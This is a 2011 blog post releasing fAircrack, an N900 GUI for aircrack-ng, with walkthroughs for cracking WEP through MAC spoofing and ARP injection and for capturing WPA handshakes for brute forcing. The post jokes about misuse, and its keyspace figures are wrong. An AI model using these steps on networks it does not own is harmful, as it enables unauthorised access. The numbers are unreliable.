Saturday, April 30, 2011

N900 FAircrack v0.3


12:34 AM |

N900 FAircrack v0.3
fAircrack v0.3 is ready! Here is what is different:

> Decrypt tab is now split in to sections for easier navigation.
> Fixed bug where you have to press the enable/disable injection buttons twice for them to work.
> Introduced basic integration with John the Ripper!

I have posted some updated screen-shots so take a look.

Update instructions:
Make sure you install John from the extras-devel repos using the following command as root: "apt-get install john". You will also need to extract the new tar into your FAS directory and overwrite any old files.




John The Ripper:
At the moment, I have only included basic support for John. There are a few limitations. Firstly, at the moment it can only break passkeys that are 8 characters long (90% of WPA keys are). Secondly you can only choose either letters, numbers or both, but no special characters yet.

Please remember that it's about 3.30am here and I have JUST finished it. I don't see any problems but if something isn't working just post here and I will have a look in the morning.

Usage:
To use John just navigate to the Decrypt tab and then click WPA. Now select the cap that you have captured a handshake for, choose your John settings (numbers/letters) then make sure you have highlighted the "John" button above the "Decrypt" button.

Please note that this is more proof of concept than anything else, and please read through the WPA section of the FAQs if you haven't already.

Have fun

---------------------------------------------------------------------------------

UPDATE: fAircrack v0.2 is out! Just a few minor changes. I'll make a bigger update over the weekend.

Changes:
> Added a button for a random mac address.
> Added a saved key browser.

Update instructions:
Just overwrite your FAS directory with the new tar. Simples

------------------------------------------------------------------------------------

Announcing fAircrack v0.1, The first Aircrack GUI for the N900 (as far as I know)

Disclaimer:

First things first, this script is only to be used to test your own network security. I am not responsible for:
> Damage to your phone
> Criminal convictions/fines
> Incidents in prison showers involving dropped soap and a tall stranger

In other words, use at your own risk and only for legitimate purposes. (And no, desperately needing to check your facebook while in a local internet café without paying is NOT a legitimate purpose)

------------------------ Features -------------------------------------------

This is the first release and as such is bound to have some bugs. It is the first ever project I have taken on of this nature so I welcome all constructive criticism.

At the moment it can:
> Enable/disable monitor mode
> Load/unload injection drivers
> Change your mac (requires macchanger)
> Scan for APs
> Capture ivs and WPA handshakes
> Authenticate
> Inject packets
> Decrypt wep and bruteforce wpa
> Bruteforce wpa using John the Ripper
> All of the above without ONCE having to press a key

What it does not do but I am working on:
> Deauthentication for wpa (at the moment it can capture the handshake when a client connects, you will have to manually deauth a client if you need to)
> Chopchop wep attack
> Fragmentation wep attack

Also working on:
> Nicer GUI (obviously this is the first version so it will be far from flawless)
> More information
> More options

------------------------ Prerequisites ----------------------------------------

Mostly the same as for my FAS script. You will need:
> PyQt
> Sudser
> Aircrack-ng
> John the Ripper
> Bleeding-edge packet injection drivers by lxp
> Macchanger (optional)

Basically, if you have used my script then all you need is PyQt.

--------------------- Setup ---------------------------------------------------

Download faircrack.tar.gz and hildon.tar.gz to your MyDocs directory, then run the following command sequence as user:

Code:
cd /home/user/MyDocs/
mkdir FAS
cd FAS
tar -xzvf /home/user/MyDocs/faircrack.tar.gz .
Make sure all the files have been extracted to the MyDocs/FAS/ directory and that the following folders exist:

MyDocs/FAS/keys/
MyDocs/FAS/diction/
MyDocs/FAS/cap/
MyDocs/FAS/cap/WEP/
MyDocs/FAS/cap/WPA/

Optional

If you would like to have a nice shortcut to fAircrack, use the next commands:
Code:
tar -xzvf /home/user/MyDocs/hildon.tar.gz .
sudo gainroot
mv faircrack.desktop /usr/share/applications/hildon/
mv faircrack.png /usr/share/icons/hicolor/48x48/hildon/
Thanks to tokag for his awesome icon.

---------------------- Usage ----------------------------------------

To run fAircrack, you can use the shortcut (recommended), or issue the following command:

sh /home/user/MyDocs/FAS/launch.sh

Bear in mind that if you are running it from xterm you will probably see a few warning messages like "*.cap does not exist" and "basename usage". This is a result of my messy coding and does not cause any problems. This will be fixed in v0.2.

WEP

Firstly a little background information from the aircrack wiki

"A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection. A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.

Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition."


First things first, from the 'Monitor' tab enable the packet injection drivers and then monitor mode. At the moment there is no way to check if the drivers are enabled or not so if you aren't sure then just click the enable button anyway.

Next, you will need to click on the 'Access Point' tab. From here select how many seconds to run a scan for (default is 5) and click the scan button. Make sure the WEP button is highlighted to show only WEP networks. Select your desired target and click the "Start Packet Capture" button. This will load airodump in an xterm. Be sure to leave this window open until you are ready to crack.

Now you must click the "Authenticate" button to attempt to authenticate with the network, which will allow you to perform packet injection. This will launch a new xterm which will display information about your authentication request. If you see a line similar to "AID 1 :-)" then all is good. If not, try changing your mac address to the same as an already authenticated client (you can see them at the bottom of the airodump xterm). Bear in mind that changing your mac requires the stopping and starting of your interface and it WILL close your airodump window

Once authenticated, click the "Injection" button, this will launch a new xterm and start listening for ARP and ACK packets. As soon as a ARP packet is captured it SHOULD start re-injecting it at about 500pps (packets per second). At this point the number of ARP requests should start to skyrocket! If injection starts but the ARP number remains static, it means you need to authenticate with the router. Leave the authentication and injection windows open.

To check how many IVs you have successfully captured, click on the "Decryption" tab, and select your current CAP file from the list. This will be the name of the network and a number. Now click the "Decrypt" button. It will load aircrack in a new xterm and after reading the packets it will display how many IVs have been captured and attempt to crack the key. You will normally need at least 50,000 IVs in order to perform a successful decryption, so if it is much less than this then you may as well close this window.

Once you are ready to crack, press the decrypt button and if you have enough IVs, the password should be broken in seconds. At this point the aircrack xterm will close and you can view the key by selecting it from the list and clicking the "Show Key" button. If it doesn't show up, just press the "Refresh" button. (Keys are also stored in your MyDocs/FAS/keys/ directory).

If all went well then the whole process should take around 8-15 minutes.


WPA

WPA is different. Read the FAQs for more information.

First scan for networks as before and select WPA to display the WPA access points. Now click on which one you want to crack and press the "Start Packet Capture" button.

Now you will have to wait for a client to connect to the access point, at which point you will see a message in the top right of your airodump window saying "WPA Handshake" followed by the mac address of the router.

Now click on the "Decryption" tab. From here select the current cap from the list (being sure to select WPA and not WEP), now select either a dictionary or specify an attack method for John. When you are ready, highlight either "wordlist" or "john" and press decrypt.

------------------------------ FAQs -----------------------------------

Q. It keeps asking me for a password. Wtf?
A. Install Sudser

Q. What's an access point?
A. Wireless router.

Q. What will I use this for?
A. If you don't know the answer to that then you don't need it.

Q. Why do I keep receiving deauth packets when authenticating?
A. I assume this is due to router security. Try changing your mac (from the main menu) to match a client that is already connected. You can find this from the already opened airodump window.

Q. Why am I not receiving any ARP packets when trying to perform injection?
A. Depending on the access point, it may be very difficult to capture/relay ARP requests, particularly if:
> You are not close enough to the access point.
> There is no traffic on the access point.
I find the number starts rising rapidly as soon as a client connects.

Q. I have tried everything, but just cannot inject/authenticate/anything. What gives?
A. Unfortunately, each make/model of router is different and no matter how hard you try you may not be able to get into it. fAircrack includes the settings that in my experience have been the most successful, but you may have better luck using aircrack directly and experimenting. (in future releases there will be far more options)

Q. Why is WPA so much harder to crack?
A. WEP encryption is weak. Each IV (initialization vector) contains a small portion of the key, so when enough of these are captured the key can be deciphered. WPA however is far more secure and cannot be "cracked". However, when an authenticated client connects to a WPA access point a "handshake" is generated. This handshake can be captured by airodump and aircrack can subsequently run a bruteforce dictionary attack against it, possibly finding the key (however if the exact key is not in the dictionary, it will obviously not work). To capture the handshake you can either wait for a client to connect, or you can launch a deauthentication attack (using my script) to force a client to disconnect and reconnect to the AP, allowing you to capture the handshake.

However, a word list big enough to 100% GUARANTEE to crack an 8-digit alphanumeric case-sensitive wpa key would have up to 62771017353866807638357894232076664161023554444640 34512896 different combinations. And this is WITHOUT symbols.

On the same basis, a 64-digit wpa key would have up to 39402006196394479212279040100143613805079739270465 44666794829340424572177149721061141426625488491564 0806627990306816 different combinations.

These wordlists would be thousands of terabytes in their totality.

In short, it's possible but not feasible. Bearing in mind that a device like the N900 could probably only check around 20-30 keys per second. The best you could do is capture the handshake with the N900 then use a desktop to attempt to crack the password.

Realistically, the only way you are going to bruteforce a wpa key is if the person who the network belongs to (obviously you ) has set something really mundane or stupid as their key. Any default key containing letters and numbers would be near enough impossible and take possibly years to break.

----------------------------------------------------------------------

Please post any comments/problems and I will be happy to address them.

Happy point-and-click pwnage everybody
Original post Link
Download in attachment
Link


Leave A Comment